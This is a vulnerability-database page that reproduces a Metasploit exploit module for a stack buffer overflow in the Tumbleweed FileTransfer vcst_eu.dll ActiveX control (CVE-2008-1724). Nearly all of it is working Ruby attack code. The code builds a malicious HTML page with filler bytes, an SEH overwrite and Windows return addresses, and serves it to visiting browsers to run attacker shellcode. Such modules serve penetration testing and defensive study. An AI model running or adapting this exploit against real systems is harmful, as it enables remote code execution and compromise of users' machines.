Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow

🗓️ 01 Jul 2014 00:00:00Reported by RootType

Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow. Exploits stack buffer overflow in vcst_eu.dll FileTransfer Module (1.0.0.5) ActiveX control in Tumbleweed SecureTransport suite to execute arbitrary cod


                                                ##
# $Id: tumbleweed_filetransfer.rb 9525 2010-06-15 07:18:08Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require &#39;msf/core&#39;


class Metasploit3 &#60; Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Seh

	def initialize(info = {})
		super(update_info(info,
			&#39;Name&#39;           =&#62; &#39;Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow&#39;,
			&#39;Description&#39;    =&#62; %q{
					This module exploits a stack buffer overflow in the vcst_eu.dll
				FileTransfer Module (1.0.0.5) ActiveX control in the Tumbleweed
				SecureTransport suite. By sending an overly long string to the
				TransferFile() &#39;remotefile&#39; function, an attacker may be able
				to execute arbitrary code.
			},
			&#39;License&#39;        =&#62; MSF_LICENSE,
			&#39;Author&#39;         =&#62; &#39;patrick&#39;,
			&#39;Version&#39;        =&#62; &#39;$Revision: 9525 $&#39;,
			&#39;References&#39;     =&#62;
				[
					[ &#39;CVE&#39;, &#39;2008-1724&#39; ],
					[ &#39;OSVDB&#39;, &#39;44252&#39; ],
					[ &#39;URL&#39;, &#39;http://www.aushack.com/200708-tumbleweed.txt&#39; ]
				],
			&#39;DefaultOptions&#39; =&#62;
				{
					&#39;EXITFUNC&#39; =&#62; &#39;process&#39;,
				},
			&#39;Payload&#39;		=&#62;
				{
					&#39;Space&#39;		=&#62; 1000,
					&#39;BadChars&#39;	=&#62; &#34;\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0&#60;&#62;()\&#34;\\&#34;,
				},
			&#39;Platform&#39;		=&#62; &#39;win&#39;,
			&#39;Targets&#39;		=&#62;
				[
					# Patrick - tested successfully against W2KSP0 EN, W2KSP4 EN, XPSP0 EN, 2007/08/17.
					[ &#39;Universal vcst_eu.dll&#39;,		{ &#39;Ret&#39; =&#62; 0x1001ee75 } ],
					[ &#39;Windows 2000 Pro English&#39;,   	{ &#39;Ret&#39; =&#62; 0x75022ac4 } ],
					[ &#39;Windows XP Pro SP0/SP1 English&#39;,	{ &#39;Ret&#39; =&#62; 0x71aa32ad } ],
				],
			&#39;DisclosureDate&#39; =&#62; &#39;Apr 07 2008&#39;,
			&#39;DefaultTarget&#39; =&#62; 0))
	end

	def on_request_uri(cli, request)
		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Randomize some things
		vname		= rand_text_alpha(rand(100) + 1)
		vurl 		= rand_text_alpha(rand(100) + 1)
		vhostName	= rand_text_alpha(rand(100) + 1)
		vlocalFile 	= rand_text_alpha(rand(100) + 1)
		vMD5	 	= rand_text_alpha(rand(100) + 1)

		# Build the exploit buffer
		filler = rand_text_alpha(4620)
		seh = generate_seh_payload(target.ret)
		sploit = filler + seh

		# Build out the message
		content = %Q|
			&#60;html&#62;
			&#60;object classid=&#34;CLSID:38681fbd-d4cc-4a59-a527-b3136db711d3&#34; id=&#34;#{vname}&#34;&#62;&#60;/object&#62;
			&#60;script language=&#34;javascript&#34;&#62;
			#{vname}.TransferFile(&#34;#{vurl}&#34;, &#34;#{vhostName}&#34;, &#34;#{vlocalFile}&#34;, &#34;#{sploit}&#34;, &#34;#{vMD5}&#34;, false, false, 80, false, true, true, 420)
			&#60;/script&#62;
			&#60;/html&#62;
			|

		print_status(&#34;Sending exploit to #{cli.peerhost}:#{cli.peerport}...&#34;)

		# Transmit the response to the client
		send_response_html(cli, content)

		# Handle the payload
		handler(cli)
	end

end

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1